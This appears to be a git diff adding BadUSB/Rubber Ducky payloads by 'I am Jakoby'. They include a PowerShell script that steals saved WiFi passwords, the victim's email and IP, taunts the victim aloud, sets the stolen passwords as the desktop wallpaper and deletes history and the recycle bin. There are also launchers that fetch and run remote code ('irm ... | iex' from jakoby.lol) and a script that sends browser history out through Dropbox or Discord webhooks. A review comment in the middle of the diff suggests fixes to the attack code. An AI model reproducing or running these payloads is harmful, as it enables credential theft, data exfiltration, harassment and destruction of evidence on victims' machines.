+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fullName = Get-fullName
+
+# echo statement used to track progress while debugging
+echo "Intro Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ RAM Info
+ This will get the amount of RAM the target computer has
+#>
+
+
+function Get-RAM {
+
+ try {
+
+ $OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf("|");$OS = $OS.Substring(0, $OSpos)
+
+ $RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1}" -f ($_.sum / 1GB)}
+ $RAMpos = $RAM.IndexOf('.')
+ $RAM = [int]$RAM.Substring(0,$RAMpos).Trim()
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $lowRAM = "$RAM gigs of ram? might as well use pen and paper"
+
+ $okRAM = "$RAM gigs of ram really? 
I have a calculator with more computing power"
+
+ $goodRAM = "$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?"
+
+ $impressiveRAM = "$RAM gigs of ram? are you serious? a super computer with no security that is funny right there"
+#----------------------------------------------------------------------------------------------------
+
+ if($RAM -le 4){
+ return $lowRAM
+ } elseif($RAM -ge 5 -and $RAM -le 12){
+ return $okRAM
+ } elseif($RAM -ge 13 -and $RAM -le 24){
+ return $goodRAM
+ } else {
+ return $impressiveRAM
+ }
+
+ }
+
+ # If one of the above parameters is not detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Error in search"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "RAM Info Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Public IP
+ This will get the public IP from the target computer
+#>
+
+
+function Get-PubIP {
+
+ try {
+
+ $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+
+ }
+
+ # If no Public IP is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No Public IP was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+ return "your public I P address is $computerPubIP"
+}
+
+# echo statement used to track progress while debugging
+echo "Pub IP Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Wifi Network and Password
+ This function will custom a tailor response based on how many characters long their password is
+#>
+
+
+function Get-Pass {
+
+ #-----VARIABLES-----#
+ # $pwl = their Pass Word Length
+ # $pass = their Password
+
+ try {
+
+ $pro = netsh wlan show 
interface | Select-String -Pattern ' SSID '; $pro = [string]$pro
+ $pos = $pro.IndexOf(':')
+ $pro = $pro.Substring($pos+2).Trim()
+
+ $pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass
+ $passPOS = $pass.IndexOf(':')
+ $pass = $pass.Substring($passPOS+2).Trim()
+
+ if($pro -like '*_5GHz*') {
+ $pro = $pro.Trimend('_5GHz')
+ }
+
+ $pwl = $pass.length
+
+
+ }
+
+ # If no network is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No network was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $badPASS = "$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?"
+
+ $okPASS = "$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better"
+
+ $goodPASS = "$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though." 
+#----------------------------------------------------------------------------------------------------
+
+ if($pass.length -lt 8) { return $badPASS
+
+ }elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS
+
+ }else { return $goodPASS
+
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "Wifi pass Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ All Wifi Networks and Passwords
+ This function will gather all current Networks and Passwords saved on the target computer
+ They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
+#>
+
+Function Get-Networks {
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
+
+# Get Wifi SSIDs and Passwords
+$WLANProfileNames =@()
+
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+
+ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+ try{
+ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+ }Catch{
+ $WLANProfilePassword = "The password is not stored in this profile"
+ }
+
+ #Build the object and add this to an array
+ $WLANProfileObject = New-Object PSCustomobject
+ $WLANProfileObject | Add-Member 
-Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+ $WLANProfileObjects += $WLANProfileObject
+ Remove-Variable WLANProfileObject
+ return $WLANProfileObjects
+}
+}
+
+$Networks = Get-Networks
+
+Add-Type @"
+using System;
+using System.Runtime.InteropServices;
+public class PInvoke {
+ [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
+ [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
+}
+"@
+$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
+$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
+$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
+
+<#
+
+.NOTES
+ This will take the image you generated and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType 
String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#############################################################################################################################################
+
+Function WallPaper-Troll {
+
+if (!$Networks) { Write-Host "variable is null"
+}else {
+
+ # This is the name of the file the networks and passwords are saved
+
+ $FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt"
+
+ ($Networks| Out-String) >> $Env:temp\$FileName
+
+ $content = [IO.File]::ReadAllText("$Env:temp\$FileName")
+
+
+# this is the message that will be coded into the image you use as the wallpaper
+
+ $hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
+
+# this will be the name of the image you use as the wallpaper
+
+ $ImageName = "dont-be-suspicious"
+
+<#
+
+.NOTES
+ This will get take the information gathered and format it into a .jpg
+#>
+
+ Add-Type -AssemblyName System.Drawing
+
+ $filename = "$env:tmp\foo.jpg"
+ $bmp = new-object System.Drawing.Bitmap $w,$h
+ $font = new-object System.Drawing.Font Consolas,18
+ $brushBg = [System.Drawing.Brushes]::White
+ $brushFg = [System.Drawing.Brushes]::Black
+ $graphics = [System.Drawing.Graphics]::FromImage($bmp)
+ $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
+ 
$graphics.DrawString($content,$font,$brushFg,500,100)
+ $graphics.Dispose()
+ $bmp.Save($filename)
+
+# Invoke-Item $filename
+
+<#
+
+.NOTES
+ This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
+ Then it will clean up the files you don't want to leave behind
+#>
+
+ echo $hiddenMessage > $Env:temp\foo.txt
+ cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
+
+ rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
+
+
+#############################################################################################################################################
+
+
+# This will open up notepad with all their saved networks and passwords and taunt them
+
+
+ $s.Speak("wanna see something really cool?")
+ Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
+ $s.Speak("Look at all your other passswords I got..")
+ Start-Sleep -Seconds 1
+ $s.Speak("These are the wifi passwords for every network you've ever connected to!")
+ Start-Sleep -Seconds 1
+ $s.Speak("I could send them to myself but i wont")
+
+}
+
+# echo statement used to track progress while debugging
+echo "All Wifi Passes Done"
+}
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Password last Set
+ This function will custom tailor a response based on how long it has been since they last changed their password
+#>
+
+
+ function Get-Days_Set {
+
+ #-----VARIABLES-----#
+ # $pls (password last set) = the date/time their password was last changed
+ # $days = the number of days since their password was last changed
+
+ try {
+
+ $pls = net user $env:UserName | Select-String -Pattern "Password last" ; $pls = [string]$pls
+ $plsPOS = $pls.IndexOf("e")
+ $pls = $pls.Substring($plsPOS+2).Trim()
+ $pls = $pls -replace ".{3}$"
+ $time = ((get-date) - (get-date "$pls")) ; $time = 
[string]$time
+ $DateArray =$time.Split(".")
+ $days = [int]$DateArray[0]
+ }
+
+ # If no password set date is detected function will return $null to cancel Sapi Speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Day password set not found"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $newPass = "$pls was the last time you changed your password... You changed your password $days days ago.. I have to applaud you.. at least you change your password often. Still did not stop me! "
+
+ $avgPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, really starting to push it, i mean look i am here. that tells you something "
+
+ $oldPASS = "$pls was the last time you changed your password... it has been $days days since you changed your password, you were basically begging me to hack you, well here i am! 
"
+#----------------------------------------------------------------------------------------------------
+
+ if($days -lt 45) { return $newPass
+
+ }elseif($days -gt 44 -and $days -lt 182) { return $avgPASS
+
+ }else { return $oldPASS
+
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "Pass last set Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Get Email
+ This function will custom tailor a response based on what type of email the target has
+#>
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+
+ $emailpos = $email.IndexOf("@")
+
+ $domain = $email.Substring($emailpos+1) #.TrimEnd(".com")
+
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "you're lucky you do not have your email connected to your account, I would have really had some fun with you then lol"
+ -ErrorAction SilentlyContinue
+ }
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $gmailResponse = "At least you use G Mail.. we should be friends. If you are down just email me back, ill message you at $email. That is your email right?"
+ $yahooResponse = "a yahoo account seriously? you are either in your 50's or just got done doing some time, a lot of it.. $email .. this is sad"
+ $hotmailResponse = "really?. you have a hotmail account? $email .. I am sending this to the f b I they need to check your hard drive"
+ $otherEmailResponse = "I dead ass do not even know what this is.. $email .. 
hope you did not think it was safe"
+#----------------------------------------------------------------------------------------------------
+
+ if($email -like '*gmail*') { return $gmailResponse
+
+ }elseif($email -like '*yahoo*') { return $yahooResponse
+
+ }elseif($email -like '*hotmail*') { return $hotmailResponse
+
+ }else { return $otherEmailResponse}
+
+
+}
+
+# echo statement used to track progress while debugging
+echo "Email Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Messages
+ This function will run all the previous functions and assign their outputs to variables
+#>
+
+$intro = "$fullName , it has been a long time my friend"
+
+$RAMwarn = Get-RAM
+
+$PUB_IPwarn = Get-PubIP
+
+$PASSwarn = Get-Pass
+
+$LAST_PASSwarn = Get-Days_Set
+
+$EMAILwarn = Get-email
+
+$OUTRO = "My crime is that of curiosity.... and yea curiosity killed the cat.... but satisfaction brought him back.... later $fullName"
+
+# echo statement used to track progress while debugging
+echo "Speak Variables set"
+
+###########################################################################################################
+
+# This turns the volume up to max level--------------------------------------------------------------------
+
+#$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+# echo statement used to track progress while debugging
+echo "Volume to max level"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ These two snippets are meant to be used as indicators to let you know the script is set up and ready
+ This will display a pop up window saying "hello $fullname"
+ Or this makes the CapsLock indicator light blink however many times you set it to
+ if you do not want the ready notice to pop up or the CapsLock light to blink comment them out below 
+#>
+
+# a popup will be displayed before freezing the script while waiting for the cursor to move to continue the script
+# else capslock light will blink as an indicator
+$popmessage = "Hello $fullName"
+
+
+$readyNotice = New-Object -ComObject Wscript.Shell;$readyNotice.Popup($popmessage)
+
+
+# caps lock indicator light
+$blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $blinks*2; $num++){$o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds 250}
+
+
+
+#-----------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continuously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue the script
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+echo "it worked"
+
+###########################################################################################################
+
+# this is where your message is spoken line by line
+
+$s=New-Object -ComObject SAPI.SpVoice
+
+# This sets how fast Sapi Speaks
+
+$s.Rate = -1
+
+$s.Speak($intro)
+
+$s.Speak($RAMwarn)
+
+$s.Speak($PUB_IPwarn)
+
+$s.Speak($PASSwarn)
+
+WallPaper-Troll
+
+$s.Speak($LAST_PASSwarn)
+
+$s.Speak($EMAILwarn)
+
+$s.Speak($OUTRO)
+
+###########################################################################################################
+
+# this snippet will leave a message on your targets desktop
+
+$message = "`nMy crime is that of 
curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back"
+
+Add-Content $home\Desktop\WithLove.txt $message
+###########################################################################################################
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
diff --git a/Payloads/AcidBurn/AcidBurn.txt b/Payloads/AcidBurn/AcidBurn.txt
new file mode 100644
index 0000000..c8ae244
--- /dev/null
+++ b/Payloads/AcidBurn/AcidBurn.txt
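Review bot: `("$fullName").TrimStart("Full Name")` in Get-fullName and `$pro.Trimend('_5GHz')` in Get-Pass do not strip a prefix or suffix — .NET `TrimStart`/`TrimEnd` take a set of characters — so a display name beginning with any of `F`, `u`, `l`, `N`, `a`, `m`, `e` loses those letters (`Nate Smith` becomes `te Smith`) and an SSID ending in any of `_`, `5`, `G`, `H`, `z` is over-trimmed; `-replace '^Full Name\s*'` and `-replace '_5GHz$'` express what the surrounding comments intend. Every `catch` block (Get-fullName, Get-RAM, Get-PubIP, Get-Pass, Get-Days_Set, Get-email) puts `-ErrorAction SilentlyContinue` on its own line after `return`, where it is unreachable and attached to no cmdlet, so those lines should simply be deleted. The clean-up section reaches well beyond this script's own artefacts: `rm $env:TEMP\* -r -Force` and `Clear-RecycleBin -Force` delete everything in the user's temp folder and recycle bin rather than just `foo.jpg`, `foo.txt` and the `*_WiFi-PWD.txt` file written above, and the `.NOTES` header should state that collateral data loss on the target is expected. `$s` is also created twice (`$s=New-Object -ComObject SAPI.SpVoice` near the top and again before the `$s.Speak` calls); the second can go.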
@@ -0,0 +1,16 @@
+REM Title: AcidBurn
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details
+
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm https://jakoby.lol/zyg | iex
+ENTER
diff --git a/Payloads/AcidBurn/README.md b/Payloads/AcidBurn/README.md
new file mode 100644
index 0000000..1293201
--- /dev/null
+++ b/Payloads/AcidBurn/README.md
@@ -0,0 +1,129 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+
+# Acid Burn
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
+
+## Description
+
+This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account.
+The SSID and WiFi password of any current or previously connected to networks.
+It determines the last day they changed their password and how many days ago.
+Once the information is gathered, the script will pause until a mouse movement is detected.
+Then, the script uses Sapi speak to roast their set up and lack of security.
+If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information.
+The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+

(back to top)

+
+### Executing program
+
+```
+powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/zyg | iex
+```
+
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* Enumerate and get Full Name, Amount of RAM, Public IP, Wifi Password Length, Wifi Networks and Passwords, Day Password was last changed, Email
+* Custom responses have been programmed to roast the target based on the information gathered during enumeration phase
+* Wifi Networks and passwords will be generated into an image that will be saved on the desktop
+* Image opened in notepad will reveal a hidden message at the bottom of the binary output
+* Script will freeze until a mouse movement is detected
+* Sapi Speak will be used to speak out loud the custom responses
+* Desktop wallpaper will be changed to the image of the targets Wifi Networks and Passwords
+* Text file will be left on the target desktop with whatever message you choose
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-AcidBurn/hacked-wallpaper.jpg)
+
+

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +Arf + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) +* [0iphor13](https://github.com/0iphor13) +* [PhilSutter](https://github.com/PhilSutter) + + +

(back to top)

diff --git a/Payloads/AcidBurn/hacked-wallpaper.jpg b/Payloads/AcidBurn/hacked-wallpaper.jpg
new file mode 100644
index 0000000..d04161d
Binary files /dev/null and b/Payloads/AcidBurn/hacked-wallpaper.jpg differ
diff --git a/Payloads/BrowserData/README.md b/Payloads/BrowserData/README.md
new file mode 100644
index 0000000..a597f52
--- /dev/null
+++ b/Payloads/BrowserData/README.md
@@ -0,0 +1,89 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
+ Table of Contents +
    +
  1. Description
  2. +
  3. The Function
  4. +
  5. Contact
  6. +
  7. Acknowledgments
  8. +
+
+ +# Get-BrowserData + +

+ + Python + +
YouTube Tutorial +

+
+## Description
+
+This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).
+
+They are then exfiled using either Discord or Dropbox.
+
+## The Function
+
+### [Get-BrowserData]
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* You no longer need to host your own version of this script
+* $db is the variable that holds your DropBox token
+* $dc is the variable that holds your Discord webhook
+* Fill in either variable or both to set your exfil method
+
+SYNTAX:
+
+```
+powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/hgw | iex
+```
+
+
+## Contact
+
+

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ + + +

(back to top)

+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [UberGuidoZ](https://github.com/UberGuidoZ)
diff --git a/Payloads/BrowserData/browserData.ps1 b/Payloads/BrowserData/browserData.ps1
new file mode 100644
index 0000000..1d7941d
--- /dev/null
+++ b/Payloads/BrowserData/browserData.ps1
@@ -0,0 +1,102 @@ +function Get-BrowserData { + + [CmdletBinding()] + param ( + [Parameter (Position=1,Mandatory = $True)] + [string]$Browser, + [Parameter (Position=1,Mandatory = $True)] + [string]$DataType + ) + + $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' + + if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} + elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} + elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} + elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} + elseif ($Browser -eq 'opera' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History"} + elseif ($Browser -eq 'opera' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks"} + + $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique + $Value | ForEach-Object { + $Key = $_ + if ($Key -match $Search){ + New-Object -TypeName PSObject -Property @{ + User = $env:UserName + Browser = $Browser + DataType = $DataType + Data = $_ + } + } + } +} + +Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP--BrowserData.txt + 
+Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "opera" -DataType "history" >> $env:TMP\--BrowserData.txt + +Get-BrowserData -Browser "opera" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt + +# Upload output file to dropbox + +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\--BrowserData.txt} + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\--BrowserData.txt} + + 
+############################################################################################################################################################ +RI $env:TEMP/--BrowserData.txt diff --git a/Payloads/BrowserData/browserData.txt b/Payloads/BrowserData/browserData.txt new file mode 100644 index 0000000..32e8912 --- /dev/null +++ b/Payloads/BrowserData/browserData.txt @@ -0,0 +1,17 @@ +REM Title: Browser-Data + +REM Author: I am Jakoby + +REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX. + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/hgw | iex +ENTER + +REM Fill in either variable or both to set your exfil method. +REM $db is the variable that holds your DropBox token. +REM $dc is the variable that holds your Discord webhook. +REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly. diff --git a/Payloads/Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Credz-Plz/Credz-Plz-Execute.txt new file mode 100644 index 0000000..fecba89 --- /dev/null +++ b/Payloads/Credz-Plz/Credz-Plz-Execute.txt @@ -0,0 +1,19 @@ +REM Title: Credz-Plz + +REM Author: I am Jakoby + +REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. + +REM See README.md file for more details. + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex +ENTER + +REM Fill in either variable or both to set your exfil method. +REM $db is the variable that holds your DropBox token. +REM $dc is the variable that holds your Discord webhook. +REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly. 
